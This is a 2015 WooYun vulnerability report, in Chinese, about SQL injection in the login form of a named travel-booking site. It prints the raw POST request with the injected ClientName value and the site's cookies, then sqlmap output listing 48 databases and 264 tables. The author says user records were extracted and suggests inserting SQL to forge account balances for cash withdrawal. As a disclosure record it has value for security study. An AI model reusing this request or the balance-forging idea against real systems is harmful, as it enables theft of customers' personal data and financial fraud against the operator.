当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131590

漏洞标题:逍遥行商旅网存在SQL注射漏洞(可导致50个数据库+几十万用户信息泄露+可随意伪造金额体现)

相关厂商:逍遥行商旅网

漏洞作者: 路人甲

提交时间:2015-08-05 15:12

修复时间:2015-09-19 15:14

公开时间:2015-09-19 15:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这个域名有点刚!

详细说明:

在扫了携程某个C段发现了这个网站,登陆处存在POST注入,抓包跑了下,50个库,当前库涉及几十万用户信息,更可以伪造金额体现。

漏洞证明:

POST /Account/Login?ReturnUrl=%2FHotelnew%2FOrder%3FcheckInDate%3D2015-08-05%26checkOutDate%3D2015-08-06%26hotelID%3DE00101025%26roomtypeId%3D1026%26rpId%3D1012861%26ppid%3D134128186 HTTP/1.1
Host: www.feijipiao.cn
Content-Length: 25
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.feijipiao.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.feijipiao.cn/Account/Login?ReturnUrl=%2fHotelnew%2fOrder%3fcheckInDate%3d2015-08-05%26checkOutDate%3d2015-08-06%26hotelID%3dE00101025%26roomtypeId%3d1026%26rpId%3d1012861%26ppid%3d134128186&checkInDate=2015-08-05&checkOutDate=2015-08-06&hotelID=E00101025&roomtypeId=1026&rpId=1012861&ppid=134128186
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=9340930048; pgv_si=s543827968; bdshare_firstime=1438672541258; travelCity=cityid=0101&cityname=%e5%8c%97%e4%ba%ac; QN163=0; 4000747888mid=987_24; 4000747888msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4000747888mh=1438672681002; 4000747888slid=slid_983_27%7C; 4000747888slid_983_27=1438672681019; his_hotel=[{"hotelName":"????o????é?????é??é???o?","hotelId":"E00101025","price":410}]; CNZZDATA1000181042=617491300-1438667942-%7C1438667942
ClientName=aaa%27&PWD=aaa

数据包

搜狗截图15年08月04日1622_5.png




[15:36:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
[15:36:51] [INFO] fetching database names
[15:36:51] [WARNING] reflective value(s) found and filtering out
[15:36:51] [INFO] the SQL query used returns 48 entries
available databases [48]:
[*] CANFeiYouShangWu
[*] CANJinTian
[*] CANJTDZB
[*] CANMoLing
[*] CANSengLan
[*] CANTianTai
[*] CANTianYiLou
[*] CANTianYun
[*] CANXingTu
[*] CANXinZhuLiu
[*] CANYuLiang
[*] CANYunShangFei
[*] CSXChunShi
[*] CSXCuoFengCY
[*] CSXFuHang
[*] CSXJinFei
[*] CSXKaiWei
[*] CSXLeFei
[*] CSXLongXing
[*] CSXTianYuSW
[*] CSXTongYun
[*] CSXWoYaoFei
[*] CSXXingShaPiaoWu
[*] CSXXinJiYuan
[*] CSXYiTong
[*] CSXYuLiang
[*] CSXZeTuo
[*] DataService
[*] FJPDB
[*] HGHWanTu
[*] HGHZhuJiFeiKuai
[*] master
[*] model
[*] msdb
[*] NNGXinRui
[*] OADB
[*] PEK360ShangLv
[*] PEKBaiWei
[*] PEKFeiYingZhanChi
[*] PEKJieLan
[*] PEKJinLongShenShi
[*] PEKJunPeng
[*] PEKWanYou
[*] PEKYiChuXing
[*] PEKYiFeiChangXing
[*] SHAShunxingTianXia
[*] TAOPengFei
[*] tempdb
[15:36:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[15:36:52] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\ou
tput\www.feijipiao.cn'

50个库,,我已经看傻了。

Database: FJPDB
[264 tables]
+----------------------------------+
| APIManager                       |
| APIManagerLog                    |
| APIOperLog                       |
| Account                          |
| ActivityLottery                  |
| Agent                            |
| AirCo                            |
| AirPort                          |
| BAArea                           |
| BAChng                           |
| BADistance                       |
| BAPlaneInfo                      |
| BAPrice                          |
| BAPriceBak                       |
| BAPriceNO                        |
| BCInfo_Temp                      |
| BCScheduling_Temp                |
| BCSwingCardTemp_Temp             |
| BDBank                           |
| BDBankCreditCard                 |
| BDBankOffLine                    |
| BDDic                            |
| BDPayPlatParam                   |
| BOLog                            |
| BOPage                           |
| BORole                           |
| BOUser                           |
| BankStatement                    |
| CabinGW                          |
| Client                           |
| ClientB2B                        |
| ClientB2BAccount                 |
| ClientB2BAirCoAcct               |
| ClientB2BBill                    |
| ClientB2BContact                 |
| ClientB2BLog                     |
| ClientB2BTranRec                 |
| ClientB2BUser                    |
| ClientB2BZChng                   |
| ClientCashLog                    |
| ClientCashTake                   |
| ClientFeedback                   |
| ClientJiFenLog                   |
| ClientLevel                      |
| ClientLoginLog                   |
| ClientPsgr                       |
| ClientRefund                     |
| CommonDiscount                   |
| CommonPassenger                  |
| Contract                         |
| Coupon                           |
| CouponType                       |
| Customer                         |
| FinMatch                         |
| FinMatchSwitch                   |
| FinSell                          |
| FinTradeDetail                   |
| FlightQuery                      |
| FlightQueryAndT                  |
| FlightQueryF                     |
| FlightQueryT                     |
| FlightTaxAirFree                 |
| FlightTemp                       |
| FriendLink                       |
| GiftSerial                       |
| GiftSerialChk                    |
| Help                             |
| HotelAddPriceDetail              |
| HotelBrand                       |
| HotelCancelRule                  |
| HotelChangePrice                 |
| HotelCommissionRule              |
| HotelCommissionRuleDetail        |
| HotelDetail                      |
| HotelDetailNew                   |
| HotelGarantee                    |
| HotelImage                       |
| HotelImageNew                    |
| HotelInfo                        |
| HotelInfoNew                     |
| HotelInfoReplenish               |
| HotelJLCity                      |
| HotelJLState                     |
| HotelLocation                    |
| HotelLocationNewID               |
| HotelLog                         |
| HotelMail                        |
| HotelNear                        |
| HotelNearNew                     |
| HotelOnlinePayment               |
| HotelOrder                       |
| HotelOrderCreditCard             |
| HotelOrderGuest                  |
| HotelOrderProcessLog             |
| HotelOrderRate                   |
| HotelPrePayBase                  |
| HotelPromotion                   |
| HotelQunar                       |
| HotelQunarCityInfo               |
| HotelQunarOrder                  |
| HotelQunarRoom                   |
| HotelRateTypeInfo                |
| HotelRelation                    |
| HotelRoom                        |
| HotelRoomNew                     |
| HotelRoomPriceDetail             |
| HotelRoomPriceDetailH            |
| HotelRoomPriceQueue              |
| HotelRoomRate                    |
| HotelRoomRateNew                 |
| HotelSearchProcess               |
| HotelSelfId                      |
| HotelUserComment                 |
| HotelUserCommentSummary          |
| InsureWaitIssue                  |
| JPAirCoRebateRateSet             |
| JPInsureProfit                   |
| MarketingLog                     |
| MarketingUser                    |
| MarketingUserDetail              |
| News                             |
| NewsComment                      |
| NewsType                         |
| Notepad                          |
| Notes                            |
| NotesType                        |
| NotesViewer                      |
| OTA                              |
| OrderAir                         |
| OrderAirBuyerTTSTask             |
| OrderAirCoTktInfoPN              |
| OrderAirComment                  |
| OrderAirF                        |
| OrderAirF_V                      |
| OrderAirGJQL                     |
| OrderAirH                        |
| OrderAirIDX                      |
| OrderAirLog                      |
| OrderAirOld                      |
| OrderAirOutTktTaskDFT            |
| OrderAirPriceChng                |
| OrderAirT                        |
| OrderAirTAPPClient               |
| OrderAirTBTktCallBack            |
| OrderAirTChange                  |
| OrderAirTChng                    |
| OrderAirTRefund                  |
| OrderAirTRefundRule              |
| OrderAirTTSNotify                |
| OrderAirTWrong                   |
| OrderAirTimeLimit                |
| OrderAirV                        |
| OrderList517                     |
| OrderLowerCabin                  |
| OrderSameCabin                   |
| OrderTicketUseStatTask           |
| Organization                     |
| PIDInfo                          |
| PIDInstructionHis                |
| PIDUserHis                       |
| PassengerInfo                    |
| PayDetach                        |
| PayTask                          |
| PayTicketNoBack                  |
| PkgAssociate                     |
| PkgAttractions                   |
| PkgOrder                         |
| PkgPicture                       |
| PkgProductInfo                   |
| PkgScenicInfo                    |
| Policy                           |
| PolicyActivityGW                 |
| PolicyActivityGWLog              |
| PolicyCheckPoint                 |
| PolicyCheckPointLog              |
| PolicyDSV                        |
| PolicyLog                        |
| PolicyOperLog                    |
| Problem                          |
| ProblemReply                     |
| ProfitAdj                        |
| QTInfo                           |
| QTInfo_Bak                       |
| QtInfoHis                        |
| RTXNotify                        |
| ReceiptCost                      |
| ReceiptCostDetail                |
| ReportTrend                      |
| ReportTrendData                  |
| SMSReceive                       |
| SMSSendWait                      |
| SMSSended                        |
| SMSTask                          |
| SMSTemplet                       |
| SMSTempletF                      |
| SYSIPAttack                      |
| SYSLog                           |
| SYSParam                         |
| SmsTaskResult                    |
| SmsTaskWait                      |
| SolarData                        |
| SpecialDiscount                  |
| SystemLog                        |
| TaoBaoAirLine                    |
| TaoBaoAirLog                     |
| TaoBaoAirPrice                   |
| TicketOrder                      |
| TicketPlatform                   |
| TicketProduct                    |
| TicketProductPrice_AI            |
| TicketProduct_AI                 |
| TicketProduct_BL                 |
| TicketProduct_JU                 |
| TicketProduct_QN                 |
| TicketQunarOrder                 |
| TicketQunarOrderPay              |
| TicketQunarOrderPerson           |
| TicketRefund                     |
| TicketResource_BL                |
| TktAirRec                        |
| TktAirRecPNRInfo                 |
| TrainAccount                     |
| TrainOrder                       |
| TrainOrderH                      |
| TrainOrderLog                    |
| TrainOrderPsgr                   |
| TrainOrderV                      |
| TrainSourceManage                |
| TrainVerify                      |
| TrainVerifyH                     |
| TrainVerifyPsgr                  |
| TrainVerifyPsgrH                 |
| TrainVersionInfo                 |
| TravelAD                         |
| TravelActivityDate               |
| TravelApiProcess                 |
| TravelBranch                     |
| TravelDates                      |
| TravelHotLocation                |
| TravelHotelInfo                  |
| TravelLineLog                    |
| TravelNavigationBar              |
| TravelNearCity                   |
| TravelOrderCreditCard            |
| TravelOrderLog                   |
| TravelPromotion                  |
| TravelSearchKeyWord              |
| TravelSeasonPopular              |
| TravelTrafficInfo                |
| TravelTui                        |
| TsqlLog                          |
| UserCollection                   |
| UserReviews                      |
| _FinTradeDetail20150313          |
| _HotelInfonewUpd0603             |
| _HuoChePiaoIDNo                  |
| _OrderAirT201501091140afterdate8 |
| _OrderAirTChng201501081625       |
| _OrderAirTChng20150121           |
| airport1                         |
| pidtemp                          |
| trace_profiler                   |
| v_BCInfo                         |
| v_BCUserSet                      |
+----------------------------------+
[15:36:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 267 times
[15:36:12] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\ou
tput\www.feijipiao.cn'
[*] shutting down at 15:36:12

当前库的内容,,,BOUser 存放USER数据

搜狗截图15年08月04日1624_6.png

随便跑了点用户。。。证明下

体现.png

这里可以sql语句添加下,增加金额数据。或者去翻一个有金额的用户,然后....

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)